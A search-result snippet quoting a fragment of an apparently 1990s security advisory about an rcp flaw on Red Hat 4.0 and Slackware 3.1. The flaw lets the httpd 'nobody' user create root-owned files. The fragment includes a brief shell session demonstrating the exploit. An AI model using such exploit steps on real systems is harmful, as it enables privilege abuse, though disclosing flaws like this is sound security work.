search for: oberheim

...A httpd server, which by default executes all cgi-bin scripts under this uid. PLATFORMS: We tested this only on Linux Red Hat 4.0 and Linux Slackware 3.1 EXPLOIT: This is kind of simple: root[11:20][504]~# su - nobody [nobody@slip-70-8 /]$ id uid=65535(nobody) gid=65535 [nobody@slip-70-8 /]$ rcp oberheim@moe.cc.utexas.edu:brb /tmp/test [nobody@slip-70-8 /]$ ls -la /tmp/test -rw------- 1 root 65535 0 Jan 29 11:20 /tmp/test But then of course this is unrealistic, since regular users don''t usually have access to the ''nobody'' account. The password is usually...